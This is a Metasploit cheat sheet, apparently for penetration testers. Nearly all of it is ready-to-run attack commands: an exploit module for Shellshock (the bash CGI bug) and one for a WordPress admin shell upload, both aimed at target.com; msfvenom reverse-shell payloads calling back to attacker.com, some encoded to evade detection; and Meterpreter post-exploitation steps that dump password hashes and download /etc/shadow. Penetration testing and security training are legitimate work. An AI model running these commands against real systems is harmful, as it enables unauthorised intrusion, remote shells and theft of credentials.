Metasploit

# Kali (pre-installed)
msfconsole

# curl installer
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall && ./msfinstall

# Docker
docker run --rm -it metasploitframework/metasploit-framework msfconsole

# Launch console
msfconsole

# Search for exploits
msf6> search type:exploit platform:linux apache

# Use an exploit
msf6> use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf6> set RHOSTS target.com
msf6> set LHOST attacker.com
msf6> exploit

# Generate payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=attacker.com LPORT=4444 -f elf > shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 -f exe > shell.exe

# Auxiliary scanner
msf6> use auxiliary/scanner/http/http_version
msf6> set RHOSTS 10.0.0.0/24
msf6> run

# Database integration
msf6> db_nmap -sV -p 1-65535 target.com
msf6> services -p 80,443
msf6> vulns

# Post-exploitation (Meterpreter)
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump
meterpreter> upload /path/to/file /tmp/file
meterpreter> download /etc/shadow
meterpreter> shell
meterpreter> portfwd add -l 8080 -p 80 -r 172.16.0.1

# Payload generation with encoding
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 -e php/base64 -f raw > shell.php
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 -e x64/xor_dynamic -i 5 -f exe > shell.exe

# Web application exploitation
msf6> use exploit/unix/webapp/wp_admin_shell_upload
msf6> set RHOSTS target.com
msf6> set USERNAME admin
msf6> set PASSWORD password123
msf6> exploit

# Listener setup
msf6> use exploit/multi/handler
msf6> set payload windows/x64/meterpreter/reverse_tcp
msf6> set LHOST 0.0.0.0
msf6> set LPORT 4444
msf6> exploit -j